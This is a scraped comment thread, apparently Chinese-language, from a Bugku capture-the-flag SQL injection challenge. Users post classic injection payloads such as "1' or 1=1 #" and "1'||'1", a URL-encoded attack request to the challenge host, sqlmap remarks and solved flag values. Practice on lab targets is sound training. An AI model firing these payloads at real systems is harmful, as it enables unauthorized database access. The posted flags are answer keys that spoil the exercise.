>> bugku
http://114.67.175.224:15398/?id=1%27+or+1%3D1%23
1' or 1=1 #
flag{dcc7859119dd6edd658e740060cfabb4}
不是,万能密码1' or 1=1--+直接出了?
可以,直接秒
flag{0bb0411b5ea88f1b175ddf531e330487}
sqlmap跑出flag数据库名,但最后没有爆出表名
1'||'1
Github里有个fuzz字典,里面有sql注入的字典。可以去看看
堆叠注入找半天,还找到好多假flag,服了,结果是' or 1=1-- s
...
评论
八一卜kod 10天前
举报
>> bugku
yaozhiwang 16天前
举报
http://114.67.175.224:15398/?id=1%27+or+1%3D1%23
yaozhiwang 16天前
举报
1' or 1=1 #
迷茫的三千面 22天前
举报
flag{dcc7859119dd6edd658e740060cfabb4}
似舞夜春 1月前
举报
不是,万能密码1' or 1=1--+直接出了?
yaozhiwang 16天前
举报
可以,直接秒
ほしの) アイ 1月前
举报
flag{0bb0411b5ea88f1b175ddf531e330487}
linjiaming 2月前
举报
sqlmap跑出flag数据库名,但最后没有爆出表名
xcngg 7月前
举报
1'||'1
15614005380 9月前
举报
Github里有个fuzz字典,里面有sql注入的字典。可以去看看
GET-lee 9月前
举报
堆叠注入找半天,还找到好多假flag,服了,结果是' or 1=1-- s